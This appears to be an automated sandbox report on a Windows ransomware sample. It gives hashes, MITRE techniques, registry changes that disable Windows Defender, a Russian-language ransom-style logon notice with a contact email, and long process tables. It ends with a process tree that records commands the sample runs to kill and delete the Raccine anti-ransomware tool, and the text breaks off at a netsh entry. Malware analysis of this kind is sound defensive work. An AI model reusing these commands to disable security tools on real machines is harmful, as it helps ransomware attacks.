2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Size

358KB
MD5

625c0b381462e729abdcca12d424e50a
SHA1

9e20fd6588a16b852d5b1f5ed122706aebce58ac
SHA256

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32
SHA512

48b289d17752bacbe65f46eee9b016264120dff5858bb87609bdfe2a10a1a1c6d12c395dc1bfa6adc8fe24b2b5da48957beec7eb0f38eaa244566ab0ac27c58d

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 10 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1108 icacls.exe
1648 icacls.exe
1544 icacls.exe
1360 icacls.exe
1568 icacls.exe
536 icacls.exe
984 icacls.exe
1396 icacls.exe
900 icacls.exe
1824 icacls.exe

pid	process
1108	icacls.exe
1648	icacls.exe
1544	icacls.exe
1360	icacls.exe
1568	icacls.exe
536	icacls.exe
984	icacls.exe
1396	icacls.exe
900	icacls.exe
1824	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Ничего не нарушайте в работе!\r\nНаши IT специалисты Вам помогут\r\nДля этого пишите на почту - secure201@armormail.net"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Важно."	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1252	taskkill.exe
1488	taskkill.exe
1588	taskkill.exe
1984	taskkill.exe
1664	taskkill.exe
2028	taskkill.exe
1672	taskkill.exe
600	taskkill.exe
1684	taskkill.exe
1884	taskkill.exe
1468	taskkill.exe
1396	taskkill.exe
572	taskkill.exe
1952	taskkill.exe
1112	taskkill.exe
944	taskkill.exe
1412	taskkill.exe
1720	taskkill.exe
1936	taskkill.exe
1992	taskkill.exe
1924	taskkill.exe
812	taskkill.exe
1952	taskkill.exe
656	taskkill.exe
1068	taskkill.exe
1592	taskkill.exe
1580	taskkill.exe
384	taskkill.exe
620	taskkill.exe
536	taskkill.exe
1160	taskkill.exe
1992	taskkill.exe
968	taskkill.exe
276	taskkill.exe
916	taskkill.exe
1480	taskkill.exe
924	taskkill.exe
1168	taskkill.exe
276	taskkill.exe
944	taskkill.exe
1648	taskkill.exe
284	taskkill.exe
1068	taskkill.exe
1176	taskkill.exe
656	taskkill.exe
384	taskkill.exe
1840	taskkill.exe
1664	taskkill.exe
984	taskkill.exe
568	taskkill.exe
1904	taskkill.exe
1496	taskkill.exe
1816	taskkill.exe
1936	taskkill.exe
1176	taskkill.exe
548	taskkill.exe
1048	taskkill.exe
1488	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1412 reg.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1476 PING.EXE
1648 PING.EXE
384 PING.EXE

pid	process
1412	reg.exe

pid	process
1476	PING.EXE
1648	PING.EXE
384	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

pid	process
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exepowershell.execonhost.exetaskkill.execonhost.execonhost.exetaskkill.exetaskkill.exetaskkill.execonhost.exetaskkill.exemountvol.exearp.exetaskkill.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exePING.EXEtaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exetaskkill.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exetaskkill.exepowershell.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenetsh.exePING.EXEcmd.exe

description	pid	process
Token: SeDebugPrivilege	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Token: SeDebugPrivilege	1068	conhost.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	1984	conhost.exe
Token: SeDebugPrivilege	1112	conhost.exe
Token: SeDebugPrivilege	548	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1068	conhost.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	812	conhost.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	1992	mountvol.exe
Token: SeDebugPrivilege	1488	arp.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	276	taskkill.exe
Token: SeDebugPrivilege	1496	conhost.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	1412	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	916	conhost.exe
Token: SeDebugPrivilege	384	PING.EXE
Token: SeDebugPrivilege	1580	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	1480	conhost.exe
Token: SeDebugPrivilege	1816	taskkill.exe
Token: SeDebugPrivilege	1588	conhost.exe
Token: SeDebugPrivilege	1840	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	384	PING.EXE
Token: SeDebugPrivilege	1936	taskkill.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	1168	taskkill.exe
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe
Token: SeDebugPrivilege	536	taskkill.exe
Token: SeDebugPrivilege	1992	mountvol.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	1672	conhost.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	276	taskkill.exe
Token: SeDebugPrivilege	572	powershell.exe
Token: SeDebugPrivilege	1924	conhost.exe
Token: SeDebugPrivilege	924	taskkill.exe
Token: SeDebugPrivilege	984	taskkill.exe
Token: SeDebugPrivilege	568	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	1952	netsh.exe
Token: SeDebugPrivilege	1648	PING.EXE
Token: SeDebugPrivilege	1488	arp.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	284	cmd.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	572	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	pid	process	target process
PID 2000 wrote to memory of 1932	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 2000 wrote to memory of 1932	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 2000 wrote to memory of 1932	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	powershell.exe
PID 2000 wrote to memory of 1068	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1068	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1068	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 808	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 808	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 808	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1412	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1412	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1412	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1616	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1616	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1616	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1664	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1664	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1664	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 284	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 284	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 284	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1580	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1580	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1580	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1884	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1884	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1884	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1992	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1992	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1992	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 296	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 296	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 296	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 548	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 548	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 548	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1156	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 2000 wrote to memory of 1156	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 2000 wrote to memory of 1156	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	sc.exe
PID 2000 wrote to memory of 1396	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1396	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1396	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1620	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	netsh.exe
PID 2000 wrote to memory of 1620	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	netsh.exe
PID 2000 wrote to memory of 1620	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	netsh.exe
PID 2000 wrote to memory of 1160	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1160	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1160	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1984	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1984	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1984	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1112	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1112	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1112	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1612	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1612	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1612	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe
PID 2000 wrote to memory of 1252	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1252	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1252	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 548	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 548	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 548	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	taskkill.exe
PID 2000 wrote to memory of 1068	2000	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe	conhost.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Важно."	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Ничего не нарушайте в работе!\r\nНаши IT специалисты Вам помогут\r\nДля этого пишите на почту - secure201@armormail.net"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe"
1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
PID:1068

C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:808

C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:1412

C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:1616

C:\Windows\system32\netsh.exe
